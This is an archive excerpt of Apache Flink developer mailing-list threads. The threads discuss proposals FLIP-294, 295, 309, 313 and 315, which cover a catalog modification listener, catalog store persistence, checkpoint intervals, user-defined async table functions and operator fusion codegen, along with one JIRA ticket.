> > I think the root cause of this issue is that the decision of the
> > checkpointing interval really depends on the expected impact of a
> > checkpoint on the throughput.
>
> Yes, I agree. Ideally we probably should adjust the checkpointing interval
> based on measured latency, for example using latency markers [3], but that
> would
> require some investigation if latency markers are indeed that costly as
> documented and if so optimizing them to solve the performance degradation
> of enabling
> e2e latency tracking.


> However, given that the new back pressure monitoring strategy would be
> optional AND users could implement their own `CheckpointTrigger` if really
> needed
> AND I have a feeling that there might be an even better solution (more
> about that later).
>

Overall I guess you are suggesting that 1) we can optimize the overhead of
latency tracking so that we can always turn it on and 2) we can use the
measured latency to dynamically determine checkpointing interval.

I can understand this intuition. Still, the devil is in the details. After
thinking more about this, I am not sure I can find a good way to make it
work. I am happy to discuss proc/cons if you provide more concrete
solutions.

Note that goals of the alternative approach include 1) support sources
other than HybridSource and 2) reduce checkpointing interval when the job
is backpressured. These goals are not necessary to achieve the use-case
targed by FLIP-309. While it will be nice to support additional use-cases
with one proposal, it is probably also reasonable to make incremental
progress and support the low-hanging-fruit use-case first. The choice
really depends on the complexity and the importance of supporting the extra
use-cases.

I am hoping that we can still be open to using the approach proposed in
FLIP-309 and we can not make the alternative approach work. What do you
think?


> > if the checkpointing overhead is
> > close to none, then it is beneficial to the e2e latency to still
> checkpoint
> > a high frequency even if there exists (intermittent) backpressure.
>
> In that case users could just configure a slow checkpointing interval to a
> lower value, or just use static checkpoint interval strategy.
>

I guess the point is that the suggested approach, which dynamically
determines the 

Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread Shammon FY
Hi yuxia

Thanks for your input. The `AlterDatabaseEvent` extends
`DatabaseModificationEvent` which has the original database.

Best,
Shammon FY

On Wed, May 31, 2023 at 2:24 PM yuxia  wrote:

> Thanks Shammon for driving it.
> The FLIP generally looks good to me. I only have one question.
> WRT AlterDatabaseEvent, IIUC, it'll contain the origin database name and
> the new CatalogDatabase after modified. Is it enough only pass the origin
> database name? Will it be better to contain the origin CatalogDatabase so
> that listener have ways to know what changes?
>
> Best regards,
> Yuxia
>
> - 原始邮件 -
> 发件人: "ron9 liu" 
> 收件人: "dev" 
> 发送时间: 星期三, 2023年 5 月 31日 上午 11:36:04
> 主题: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
>
> Hi, Shammon
>
> Thanks for driving this FLIP, It will enforce the Flink metadata capability
> from the platform produce perspective. The overall design looks good to me,
> I just have some small question:
> 1. Regarding CatalogModificationListenerFactory#createListener method, I
> think it would be better to pass Context as its parameter instead of two
> specific Object. In this way, we can easily extend it in the future and
> there will be no compatibility problems. Refer to
>
> https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
> 2. In FLIP, you mentioned that multiple Flink tables may refer to the same
> physical table, so does the Listener report this physical table repeatedly?
> 3. When registering a Listener object, will it connect to an external
> system such as Datahub? If the Listener object registration times out due
> to permission issues, it will affect the execution of all subsequent SQL,
> what should we do in this case?
>
> Best,
> Ron
>
> Shammon FY  于2023年5月31日周三 08:53写道:
>
> > Thanks Feng, the catalog modification listener is only used to report
> > read-only ddl information to other components or systems.
> >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > process?
> >
> > Users need to handle the exception in the listener themselves. Many DDLs
> > such as drop tables and alter tables cannot be rolled back, Flink cannot
> > handle these exceptions for the listener. It will cause the operation to
> > exit if an exception is thrown, but the executed DDL will be successful.
> >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > specific operations executed first?  If I want to perform DDL permission
> > verification(such as integrating with Ranger based on the listener) , is
> > that possible?
> >
> > The listener will be notified to report catalog modification after DDLs
> are
> > successful, so you can not do permission verification for DDL in the
> > listener. As mentioned above, Flink will not roll back the DDL even when
> > the listener throws an exception. I think permission verification is
> > another issue and can be discussed separately.
> >
> >
> > Best,
> > Shammon FY
> >
> > On Tue, May 30, 2023 at 1:07 AM Feng Jin  wrote:
> >
> > > Hi, Shammon
> > >
> > > Thanks for driving this Flip, [Support Customized Job Meta Data
> Listener]
> > > will  make it easier for Flink to collect lineage information.
> > > I fully agree with the overall solution and have a small question:
> > >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > > process?
> > >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > > specific operations executed first?  If I want to perform DDL
> permission
> > > verification(such as integrating with Ranger based on the listener) ,
> is
> > > that possible?
> > >
> > >
> > > Best,
> > > Feng
> > >
> > > On Fri, May 26, 2023 at 4:09 PM Shammon FY  wrote:
> > >
> > > > Hi devs,
> > > >
> > > > We would like to bring up a discussion about FLIP-294: Support
> > Customized
> > > > Job Meta Data Listener[1]. We have had several discussions with Jark
> > Wu,
> > > > Leonard Xu, Dong Lin, Qingsheng Ren and Poorvank about the functions
> > and
> > > > interfaces, and thanks for their valuable advice.
> > > > The overall job and connector information is divided into metadata
> and
> > > > lineage, this FLIP focuses on metadata and lineage will be discussed
> in
> > > > another FLIP in the future. In this FLIP we want to add a customized
> > > > listener in Flink to report catalog modifications to external
> metadata
> > > > systems such as datahub[2] or atlas[3]. Users can view the specific
> > > > information of connectors such as source and sink for Flink jobs in
> > these
> > > > systems, including fields, watermarks, partitions, etc.
> > > >
> > > > Looking forward to hearing from you, thanks.
> > > >
> > > >
> > > > [1]
> > > >
> > > >
> > >
> >
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-294%3A+Support+Customized+Job+Meta+Data+Listener
> > > > [2] 

Re: [DISCUSS] FLIP-313 Add support of User Defined AsyncTableFunction

2023-05-31 Thread Aitozi
Hi Jing,
What do you think about it? Can we move forward this feature?

Thanks,
Aitozi.

Aitozi  于2023年5月29日周一 09:56写道:

> Hi Jing,
> > "Do you mean to support the AyncTableFunction beyond the
> LookupTableSource?"
> Yes, I mean to support the AyncTableFunction beyond the LookupTableSource.
>
> The "AsyncTableFunction" is the function with ability to be executed async
> (with AsyncWaitOperator).
> The async lookup join is a one of usage of this. So, we don't have to bind
> the AyncTableFunction with LookupTableSource.
> If User-defined AsyncTableFunction is supported, user can directly use
> lateral table syntax to perform async operation.
>
> > "It would be better if you could elaborate the proposed changes wrt the
> CorrelatedCodeGenerator with more details"
>
> In the proposal, we use lateral table syntax to support the async table
> function. So the planner will also treat this statement to a
> CommonExecCorrelate node. So the runtime code should be generated in
> CorrelatedCodeGenerator.
> In CorrelatedCodeGenerator, we will know the TableFunction's Kind of
> `FunctionKind.Table` or `FunctionKind.ASYNC_TABLE`
> For  `FunctionKind.ASYNC_TABLE` we can generate a AsyncWaitOperator to
> execute the async table function.
>
>
> Thanks,
> Aitozi.
>
>
> Jing Ge  于2023年5月29日周一 03:22写道:
>
>> Hi Aitozi,
>>
>> Thanks for the clarification. The naming "Lookup" might suggest using it
>> for table look up. But conceptually what the eval() method will do is to
>> get a collection of results(Row, RowData) from the given keys. How it will
>> be done depends on the implementation, i.e. you can implement your own
>> Source[1][2]. The example in the FLIP should be able to be handled in this
>> way.
>>
>> Do you mean to support the AyncTableFunction beyond the LookupTableSource?
>> It would be better if you could elaborate the proposed changes wrt the
>> CorrelatedCodeGenerator with more details. Thanks!
>>
>> Best regards,
>> Jing
>>
>> [1]
>>
>> https://github.com/apache/flink/blob/678370b18e1b6c4a23e5ce08f8efd05675a0cc17/flink-table/flink-table-common/src/main/java/org/apache/flink/table/connector/source/LookupTableSource.java#L64
>> [2]
>>
>> https://github.com/apache/flink/blob/678370b18e1b6c4a23e5ce08f8efd05675a0cc17/flink-table/flink-table-common/src/main/java/org/apache/flink/table/connector/source/AsyncTableFunctionProvider.java#L49
>>
>> On Sat, May 27, 2023 at 9:48 AM Aitozi  wrote:
>>
>> > Hi Jing,
>> > Thanks for your response. As stated in the FLIP, the purpose of this
>> > FLIP is meant to support
>> > user-defined async table function. As described in flink document [1]
>> >
>> > Async table functions are special functions for table sources that
>> perform
>> > > a lookup.
>> > >
>> >
>> > So end user can not directly define and use async table function now. An
>> > user case is reported in [2]
>> >
>> > So, in conclusion, no new interface is introduced, but we extend the
>> > ability to support user-defined async table function.
>> >
>> > [1]:
>> >
>> >
>> https://nightlies.apache.org/flink/flink-docs-release-1.17/docs/dev/table/functions/udfs/
>> > [2]: https://lists.apache.org/thread/qljwd40v5ntz6733cwcdr8s4z97b343b
>> >
>> > Thanks.
>> > Aitozi.
>> >
>> >
>> > Jing Ge  于2023年5月27日周六 06:40写道:
>> >
>> > > Hi Aitozi,
>> > >
>> > > Thanks for your proposal. I am not quite sure if I understood your
>> > thoughts
>> > > correctly. You described a special case implementation of the
>> > > AsyncTableFunction with on public API changes. Would you please
>> elaborate
>> > > your purpose of writing a FLIP according to the FLIP documentation[1]?
>> > > Thanks!
>> > >
>> > > [1]
>> > >
>> > >
>> >
>> https://cwiki.apache.org/confluence/display/FLINK/Flink+Improvement+Proposals
>> > >
>> > > Best regards,
>> > > Jing
>> > >
>> > > On Wed, May 24, 2023 at 1:07 PM Aitozi  wrote:
>> > >
>> > > > May I ask for some feedback  :D
>> > > >
>> > > > Thanks,
>> > > > Aitozi
>> > > >
>> > > > Aitozi  于2023年5月23日周二 19:14写道:
>> > > > >
>> > > > > Just catch an user case report from Giannis Polyzos for this
>> usage:
>> > > > >
>> > > > > https://lists.apache.org/thread/qljwd40v5ntz6733cwcdr8s4z97b343b
>> > > > >
>> > > > > Aitozi  于2023年5月23日周二 17:45写道:
>> > > > > >
>> > > > > > Hi guys,
>> > > > > > I want to bring up a discussion about adding support of User
>> > > > > > Defined AsyncTableFunction in Flink.
>> > > > > > Currently, async table function are special functions for table
>> > > source
>> > > > > > to perform
>> > > > > > async lookup. However, it's worth to support the user defined
>> async
>> > > > > > table function.
>> > > > > > Because, in this way, the end SQL user can leverage it to
>> perform
>> > the
>> > > > > > async operation
>> > > > > > which is useful to maximum the system throughput especially for
>> IO
>> > > > > > bottleneck case.
>> > > > > >
>> > > > > > You can find some more detail in [1].
>> > > > > >
>> > > > > > Looking forward to feedback
>> > > > > >
>> > > > > >
>> > > > 

Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread Shammon FY
Hi ron,

Thanks for your feedback.

> 1. Regarding CatalogModificationListenerFactory#createListener method, I
think it would be better to pass Context as its parameter instead of two
specific Object. In this way, we can easily extend it in the future and
there will be no compatibility problems.

It sounds good to me I will add Context in
CatalogModificationListenerFactory, thanks

> 2. In FLIP, you mentioned that multiple Flink tables may refer to the
same physical table, so does the Listener report this physical table
repeatedly?

Yes, the listeners for different jobs may receive the same physical table,
users should check and update the table information based on the
identifier. For example, users may create tables on the same kafka topic in
different jobs, which will notify listeners for the same kafka topic.

> 3. When registering a Listener object, will it connect to an external
system such as Datahub? If the Listener object registration times out due
to permission issues, it will affect the execution of all subsequent SQL,
what should we do in this case?

Users should establish connections to external systems when creating a
listener as needed, and they should handle the exceptions too. If users
fail to create a listener and throw an exception, Flink will throw the
exception too.

Best,
Shammon FY

On Wed, May 31, 2023 at 11:36 AM liu ron  wrote:

> Hi, Shammon
>
> Thanks for driving this FLIP, It will enforce the Flink metadata capability
> from the platform produce perspective. The overall design looks good to me,
> I just have some small question:
> 1. Regarding CatalogModificationListenerFactory#createListener method, I
> think it would be better to pass Context as its parameter instead of two
> specific Object. In this way, we can easily extend it in the future and
> there will be no compatibility problems. Refer to
>
> https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
> 2. In FLIP, you mentioned that multiple Flink tables may refer to the same
> physical table, so does the Listener report this physical table repeatedly?
> 3. When registering a Listener object, will it connect to an external
> system such as Datahub? If the Listener object registration times out due
> to permission issues, it will affect the execution of all subsequent SQL,
> what should we do in this case?
>
> Best,
> Ron
>
> Shammon FY  于2023年5月31日周三 08:53写道:
>
> > Thanks Feng, the catalog modification listener is only used to report
> > read-only ddl information to other components or systems.
> >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > process?
> >
> > Users need to handle the exception in the listener themselves. Many DDLs
> > such as drop tables and alter tables cannot be rolled back, Flink cannot
> > handle these exceptions for the listener. It will cause the operation to
> > exit if an exception is thrown, but the executed DDL will be successful.
> >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > specific operations executed first?  If I want to perform DDL permission
> > verification(such as integrating with Ranger based on the listener) , is
> > that possible?
> >
> > The listener will be notified to report catalog modification after DDLs
> are
> > successful, so you can not do permission verification for DDL in the
> > listener. As mentioned above, Flink will not roll back the DDL even when
> > the listener throws an exception. I think permission verification is
> > another issue and can be discussed separately.
> >
> >
> > Best,
> > Shammon FY
> >
> > On Tue, May 30, 2023 at 1:07 AM Feng Jin  wrote:
> >
> > > Hi, Shammon
> > >
> > > Thanks for driving this Flip, [Support Customized Job Meta Data
> Listener]
> > > will  make it easier for Flink to collect lineage information.
> > > I fully agree with the overall solution and have a small question:
> > >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > > process?
> > >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > > specific operations executed first?  If I want to perform DDL
> permission
> > > verification(such as integrating with Ranger based on the listener) ,
> is
> > > that possible?
> > >
> > >
> > > Best,
> > > Feng
> > >
> > > On Fri, May 26, 2023 at 4:09 PM Shammon FY  wrote:
> > >
> > > > Hi devs,
> > > >
> > > > We would like to bring up a discussion about FLIP-294: Support
> > Customized
> > > > Job Meta Data Listener[1]. We have had several discussions with Jark
> > Wu,
> > > > Leonard Xu, Dong Lin, Qingsheng Ren and Poorvank about the functions
> > and
> > > > interfaces, and thanks for their valuable advice.
> > > > The overall job and connector information is divided into metadata
> and
> > > > lineage, this FLIP focuses on metadata and lineage will be discussed
> in
> 

[jira] [Created] (FLINK-32220) Improving the adaptive local hash agg code to avoid get value from RowData repeatedly

2023-05-31 Thread dalongliu (Jira)
dalongliu created FLINK-32220:
-

 Summary: Improving the adaptive local hash agg code to avoid get 
value from RowData repeatedly
 Key: FLINK-32220
 URL: https://issues.apache.org/jira/browse/FLINK-32220
 Project: Flink
  Issue Type: Improvement
  Components: Table SQL / Runtime
Affects Versions: 1.17.0
Reporter: dalongliu
 Fix For: 1.18.0






--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [DISCUSS] FLIP-315: Support Operator Fusion Codegen for Flink SQL

2023-05-31 Thread liu ron
Hi, Jinsong

Thanks for your valuable suggestions.

Best,
Ron

Jingsong Li  于2023年5月30日周二 13:22写道:

> Thanks Ron for your information.
>
> I suggest that it can be written in the Motivation of FLIP.
>
> Best,
> Jingsong
>
> On Tue, May 30, 2023 at 9:57 AM liu ron  wrote:
> >
> > Hi, Jingsong
> >
> > Thanks for your review. We have tested it in TPC-DS case, and got a 12%
> > gain overall when only supporting only Calc operator. In
> > some queries, we even get more than 30% gain, it looks like  an effective
> > way.
> >
> > Best,
> > Ron
> >
> > Jingsong Li  于2023年5月29日周一 14:33写道:
> >
> > > Thanks Ron for the proposal.
> > >
> > > Do you have some benchmark results for the performance improvement? I
> > > am more concerned about the improvement on Flink than the data in
> > > other papers.
> > >
> > > Best,
> > > Jingsong
> > >
> > > On Mon, May 29, 2023 at 2:16 PM liu ron  wrote:
> > > >
> > > > Hi, dev
> > > >
> > > > I'd like to start a discussion about FLIP-315: Support Operator
> Fusion
> > > > Codegen for Flink SQL[1]
> > > >
> > > > As main memory grows, query performance is more and more determined
> by
> > > the
> > > > raw CPU costs of query processing itself, this is due to the query
> > > > processing techniques based on interpreted execution shows poor
> > > performance
> > > > on modern CPUs due to lack of locality and frequent instruction
> > > > mis-prediction. Therefore, the industry is also researching how to
> > > improve
> > > > engine performance by increasing operator execution efficiency. In
> > > > addition, during the process of optimizing Flink's performance for
> TPC-DS
> > > > queries, we found that a significant amount of CPU time was spent on
> > > > virtual function calls, framework collector calls, and invalid
> > > > calculations, which can be optimized to improve the overall engine
> > > > performance. After some investigation, we found Operator Fusion
> Codegen
> > > > which is proposed by Thomas Neumann in the paper[2] can address these
> > > > problems. I have finished a PoC[3] to verify its feasibility and
> > > validity.
> > > >
> > > > Looking forward to your feedback.
> > > >
> > > > [1]:
> > > >
> > >
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-315+Support+Operator+Fusion+Codegen+for+Flink+SQL
> > > > [2]: http://www.vldb.org/pvldb/vol4/p539-neumann.pdf
> > > > [3]: https://github.com/lsyldliu/flink/tree/OFCG
> > > >
> > > > Best,
> > > > Ron
> > >
>


Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread yuxia
Thanks Shammon for driving it. 
The FLIP generally looks good to me. I only have one question.
WRT AlterDatabaseEvent, IIUC, it'll contain the origin database name and the 
new CatalogDatabase after modified. Is it enough only pass the origin database 
name? Will it be better to contain the origin CatalogDatabase so that listener 
have ways to know what changes?

Best regards,
Yuxia

- 原始邮件 -
发件人: "ron9 liu" 
收件人: "dev" 
发送时间: 星期三, 2023年 5 月 31日 上午 11:36:04
主题: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

Hi, Shammon

Thanks for driving this FLIP, It will enforce the Flink metadata capability
from the platform produce perspective. The overall design looks good to me,
I just have some small question:
1. Regarding CatalogModificationListenerFactory#createListener method, I
think it would be better to pass Context as its parameter instead of two
specific Object. In this way, we can easily extend it in the future and
there will be no compatibility problems. Refer to
https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
2. In FLIP, you mentioned that multiple Flink tables may refer to the same
physical table, so does the Listener report this physical table repeatedly?
3. When registering a Listener object, will it connect to an external
system such as Datahub? If the Listener object registration times out due
to permission issues, it will affect the execution of all subsequent SQL,
what should we do in this case?

Best,
Ron

Shammon FY  于2023年5月31日周三 08:53写道:

> Thanks Feng, the catalog modification listener is only used to report
> read-only ddl information to other components or systems.
>
> > 1. Will an exception thrown by the listener affect the normal execution
> process?
>
> Users need to handle the exception in the listener themselves. Many DDLs
> such as drop tables and alter tables cannot be rolled back, Flink cannot
> handle these exceptions for the listener. It will cause the operation to
> exit if an exception is thrown, but the executed DDL will be successful.
>
> > 2. What is the order of execution? Is the listener executed first or are
> specific operations executed first?  If I want to perform DDL permission
> verification(such as integrating with Ranger based on the listener) , is
> that possible?
>
> The listener will be notified to report catalog modification after DDLs are
> successful, so you can not do permission verification for DDL in the
> listener. As mentioned above, Flink will not roll back the DDL even when
> the listener throws an exception. I think permission verification is
> another issue and can be discussed separately.
>
>
> Best,
> Shammon FY
>
> On Tue, May 30, 2023 at 1:07 AM Feng Jin  wrote:
>
> > Hi, Shammon
> >
> > Thanks for driving this Flip, [Support Customized Job Meta Data Listener]
> > will  make it easier for Flink to collect lineage information.
> > I fully agree with the overall solution and have a small question:
> >
> > 1. Will an exception thrown by the listener affect the normal execution
> > process?
> >
> > 2. What is the order of execution? Is the listener executed first or are
> > specific operations executed first?  If I want to perform DDL permission
> > verification(such as integrating with Ranger based on the listener) , is
> > that possible?
> >
> >
> > Best,
> > Feng
> >
> > On Fri, May 26, 2023 at 4:09 PM Shammon FY  wrote:
> >
> > > Hi devs,
> > >
> > > We would like to bring up a discussion about FLIP-294: Support
> Customized
> > > Job Meta Data Listener[1]. We have had several discussions with Jark
> Wu,
> > > Leonard Xu, Dong Lin, Qingsheng Ren and Poorvank about the functions
> and
> > > interfaces, and thanks for their valuable advice.
> > > The overall job and connector information is divided into metadata and
> > > lineage, this FLIP focuses on metadata and lineage will be discussed in
> > > another FLIP in the future. In this FLIP we want to add a customized
> > > listener in Flink to report catalog modifications to external metadata
> > > systems such as datahub[2] or atlas[3]. Users can view the specific
> > > information of connectors such as source and sink for Flink jobs in
> these
> > > systems, including fields, watermarks, partitions, etc.
> > >
> > > Looking forward to hearing from you, thanks.
> > >
> > >
> > > [1]
> > >
> > >
> >
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-294%3A+Support+Customized+Job+Meta+Data+Listener
> > > [2] https://datahub.io/
> > > [3] https://atlas.apache.org/#/
> > >
> >
>


Re: [DISCUSS] FLIP 295: Support persistence of Catalog configuration and asynchronous registration

2023-05-31 Thread liu ron
Hi, Feng

Thanks for driving this FLIP, this proposal is very useful for catalog
management.
I have some small questions:

1. Regarding the CatalogStoreFactory#createCatalogStore method, do we need
to provide a default implementation?
2. If we get Catalog from CatalogStore, after initializing it, whether we
put it to Map catalogs again?
3. Regarding the options `sql.catalog.store.type` and
`sql.catalog.store.file.path`, how about renaming them to
`catalog.store.type` and `catalog.store.path`?

Best,
Ron

Feng Jin  于2023年5月29日周一 21:19写道:

> Hi yuxia
>
>  > But from the code in Proposed Changes, once we register the Catalog, we
> initialize it and open it. right?
>
> Yes, In order to avoid inconsistent semantics of the original CREATE
> CATALOG DDL, Catalog will be directly initialized in registerCatalog so
> that parameter validation can be performed.
>
> In the current design, lazy initialization is mainly reflected in
> getCatalog. If CatalogStore has already saved some catalog configurations,
> only initialization is required in getCatalog.
>
>
> Best,
> Feng
>
> On Mon, May 29, 2023 at 8:27 PM yuxia  wrote:
>
> > Hi, Feng.
> > I'm trying to understanding the meaning of *lazy initialization*. If i'm
> > wrong, please correct me.
> >
> > IIUC, lazy initialization means only you need to access the catalog, then
> > you initialize it. But from the code in Proposed Changes, once we
> register
> > the Catalog,
> > we initialize it and open it. right?
> >
> > Best regards,
> > Yuxia
> >
> > - 原始邮件 -
> > 发件人: "Jing Ge" 
> > 收件人: "dev" 
> > 发送时间: 星期一, 2023年 5 月 29日 下午 5:12:46
> > 主题: Re: [DISCUSS] FLIP 295: Support persistence of Catalog configuration
> > and asynchronous registration
> >
> > Hi Feng,
> >
> > Thanks for your effort! +1 for the proposal.
> >
> > One of the major changes is that current design will provide
> > Map catalogs as a snapshot instead of a cache, which
> means
> > once it has been initialized, any changes done by other sessions will not
> > affect it. Point 6 described follow-up options for further improvement.
> >
> > Best regards,
> > Jing
> >
> > On Mon, May 29, 2023 at 5:31 AM Feng Jin  wrote:
> >
> > > Hi all, I would like to update you on the latest progress of the FLIP.
> > >
> > >
> > > Last week, Leonard Xu, HangRuan, Jing Ge, Shammon FY, ShengKai Fang
> and I
> > > had an offline discussion regarding the overall solution for Flink
> > > CatalogStore. We have reached a consensus and I have updated the final
> > > solution in FLIP.
> > >
> > > Next, let me briefly describe the entire design:
> > >
> > >1.
> > >
> > >Introduce CatalogDescriptor to store catalog configuration similar
> to
> > >TableDescriptor.
> > >2.
> > >
> > >The two key functions of CatalogStore - void storeCatalog(String
> > >catalogName, CatalogDescriptor) and CatalogDescriptor
> > getCatalog(String)
> > >will both use CatalogDescriptor instead of Catalog instance. This
> way,
> > >CatalogStore will only be responsible for saving and retrieving
> > catalog
> > >configurations without having to initialize catalogs.
> > >3.
> > >
> > >The default registerCatalog(String catalogName, Catalog catalog)
> > >function in CatalogManager will be marked as deprecated.
> > >4.
> > >
> > >A new function registerCatalog(String catalogName, CatalogDescriptor
> > >catalog) will be added to serve as the default registration function
> > for
> > >catalogs in CatalogManager.
> > >5.
> > >
> > >Map catalogs in CataloManager will remain unchanged
> > and
> > >save initialized catalogs.This means that deletion operations from
> one
> > >session won't synchronize with other sessions.
> > >6.
> > >
> > >To support multi-session synchronization scenarios for deletions
> later
> > >on we should make Mapcatalogs configurable.There may
> > be
> > >three possible situations:
> > >
> > >a.Default caching of all initialized catalogs
> > >
> > >b.Introduction of LRU cache logic which can automatically clear
> > >long-unused catalogs.
> > >
> > >c.No caching of any instances; each call to getCatalog creates a new
> > >instance.
> > >
> > >
> > > This is the document for discussion:
> > >
> > >
> >
> https://docs.google.com/document/d/1HRJNd4_id7i6cUxGnAybmYZIwl5g1SmZCOzGdUz-6lU/edit
> > >
> > > This is the final proposal document:
> > >
> > >
> >
> https://cwiki.apache.org/confluence/display/FLINK/FLIP-295%3A+Support+lazy+initialization+of+catalogs+and+persistence+of+catalog+configurations
> > >
> > >
> > > Thank you very much for your attention and suggestions on this FLIP.  A
> > > special thanks to Hang Ruan for his suggestions on the entire design
> and
> > > organizing offline discussions.
> > >
> > > If you have any further suggestions or feedback about this FLIP please
> > feel
> > > free to share.
> > >
> > >
> > > Best,
> > >
> > > Feng
> > >
> > > On Sat, May 6, 2023 at 8:32 PM Jing Ge 
> > wrote:
> > >
> > >